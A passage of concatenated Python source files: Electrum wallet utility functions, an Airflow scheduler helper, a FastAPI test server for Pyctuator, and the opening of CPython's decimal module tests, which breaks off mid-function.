jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(b):
global verbosity
verbosity = b
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
try:
os.mkdir(d)
except FileExistsError:
pass # in case of race
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Biteasy.com': ('https://www.biteasy.com/blockchain/',
{'tx': 'transactions/', 'addr': 'addresses/'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp/',
{'tx': 'Transaction/', 'addr': 'Address/'}),
'Blockchain.info': ('https://blockchain.info/',
{'tx': 'tx/', 'addr': 'address/'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion/',
{'tx': 'tx/', 'addr': 'address/'}),
'Blockr.io': ('https://btc.blockr.io/',
{'tx': 'tx/info/', 'addr': 'address/info/'}),
'Blocktrail.com': ('https://www.blocktrail.com/BTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'BTC.com': ('https://chain.btc.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'Chain.so': ('https://www.chain.so/',
{'tx': 'tx/BTC/', 'addr': 'address/BTC/'}),
'Insight.is': ('https://insight.bitpay.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain/',
{'tx': 'tx/', 'addr': 'address/'}),
'BlockCypher.com': ('https://live.blockcypher.com/btc/',
{'tx': 'tx/', 'addr': 'address/'}),
'Blockchair.com': ('https://blockchair.com/bitcoin/',
{'tx': 'transaction/', 'addr': 'address/'}),
'blockonomics.co': ('https://www.blockonomics.co/',
{'tx': 'api/tx?txid=', 'addr': '#/search?q='}),
'OXT.me': ('https://oxt.me/',
{'tx': 'transaction/', 'addr': 'address/'}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise Exception("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid bitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
airflow_scheduler_utils.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import signal
import threading
import time
import os
import logging
import multiprocessing as mp
from subprocess import Popen
from ai_flow.plugin_interface.scheduler_interface import WorkflowExecutionInfo
from airflow.contrib.jobs.event_based_scheduler_job import EventBasedSchedulerJob
from airflow.events.scheduler_events import StopSchedulerEvent
from airflow.executors.local_executor import LocalExecutor
from typing import Callable
from notification_service.client import NotificationClient
def start_scheduler(file_path, port=50051, executor=None):
if executor is None:
executor = LocalExecutor(15)
scheduler = EventBasedSchedulerJob(
dag_directory=file_path,
server_uri="localhost:{}".format(port),
executor=executor,
max_runs=-1,
refresh_dag_dir_interval=30
)
print("scheduler starting")
scheduler.run()
def start_airflow_scheduler_server(file_path, port=50051) -> mp.Process:
mp.set_start_method('spawn')
process = mp.Process(target=start_scheduler, args=(file_path, port))
process.start()
return process
def start_airflow_web_server() -> Popen:
def pre_exec():
# Restore default signal disposition and invoke setsid
for sig in ('SIGPIPE', 'SIGXFZ', 'SIGXFSZ'):
if hasattr(signal, sig):
signal.signal(getattr(signal, sig), signal.SIG_DFL)
os.setsid()
env = os.environ.copy()
stdout_log = './web.log'
with open(stdout_log, 'w') as out:
sub_process = Popen( # pylint: disable=subprocess-popen-preexec-fn
'airflow webserver -p 8080',
stdout=out,
stderr=out,
env=env,
shell=True,
preexec_fn=pre_exec,
)
logging.info('Process pid: %s', sub_process.pid)
return sub_process
def run_ai_flow_workflow(dag_id, test_function: Callable[[NotificationClient], None], port=50051, executor=None):
def run_test_fun():
time.sleep(5)
client = NotificationClient(server_uri="localhost:{}".format(port),
default_namespace="test")
try:
test_function(client)
except Exception as e:
raise e
finally:
client.send_event(StopSchedulerEvent(job_id=0).to_event())
t = threading.Thread(target=run_test_fun, args=())
t.setDaemon(True)
t.start()
dag_file = '/tmp/airflow/' + dag_id + '.py'
start_scheduler(file_path=dag_file, port=port, executor=executor)
def get_dag_id(namespace, workflow_name):
return '{}.{}'.format(namespace, workflow_name)
class WorkflowExecutionWrapper(object):
def __init__(self):
self.workflow_execution_info: WorkflowExecutionInfo = None
workflow_wrapper = WorkflowExecutionWrapper()
def set_workflow_execution_info(workflow_execution_info: WorkflowExecutionInfo):
global workflow_wrapper
workflow_wrapper.workflow_execution_info = workflow_execution_info
def get_workflow_execution_info() -> WorkflowExecutionInfo:
global workflow_wrapper
return workflow_wrapper.workflow_execution_info
|
fast_api_test_server.py | import logging
import threading
import time
from typing import Optional
from fastapi import FastAPI
from starlette.requests import Request
from starlette.responses import Response
from uvicorn.config import Config
from pyctuator.pyctuator import Pyctuator
from tests.conftest import PyctuatorServer, CustomServer
class FastApiPyctuatorServer(PyctuatorServer):
def __init__(self) -> None:
self.app = FastAPI(
title="FastAPI Example Server",
description="Demonstrate Spring Boot Admin Integration with FastAPI",
docs_url="/api",
)
self.pyctuator = Pyctuator(
self.app,
"FastAPI Pyctuator",
"http://localhost:8000",
"http://localhost:8000/pyctuator",
"http://localhost:8001/register",
registration_interval_sec=1,
metadata=self.metadata,
additional_app_info=self.additional_app_info,
)
@self.app.get("/logfile_test_repeater", tags=["pyctuator"])
# pylint: disable=unused-variable
def logfile_test_repeater(repeated_string: str) -> str:
logging.error(repeated_string)
return repeated_string
self.server = CustomServer(config=(Config(app=self.app, loop="asyncio")))
self.thread = threading.Thread(target=self.server.run)
@self.app.get("/httptrace_test_url")
# pylint: disable=unused-variable
def get_httptrace_test_url(request: Request, sleep_sec: Optional[int]) -> Response:
# Sleep if requested to sleep - used for asserting httptraces timing
if sleep_sec:
logging.info("Sleeping %s seconds before replying", sleep_sec)
time.sleep(sleep_sec)
# Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly
headers = {
"resp-data": str(request.headers.get("User-Data")),
"response-secret": "my password"
}
return Response(headers=headers, content="my content")
def start(self) -> None:
self.thread.start()
while not self.server.started:
time.sleep(0.01)
def stop(self) -> None:
logging.info("Stopping FastAPI server")
self.pyctuator.stop()
# Allow the recurring registration to complete any in-progress request before stopping FastAPI
time.sleep(1)
self.server.should_exit = True
self.server.force_exit = True
self.thread.join()
logging.info("FastAPI server stopped")
def atexit(self) -> None:
if self.pyctuator.boot_admin_registration_handler:
self.pyctuator.boot_admin_registration_handler.deregister_from_admin_server()
|
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings,
requires_legacy_unicode_capi)
from test.support import (TestFailed,
run_with_locale, cpython_only)
from test.support.import_helper import import_fresh_module
from test.support import warnings_helper
import random
import inspect
import threading
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
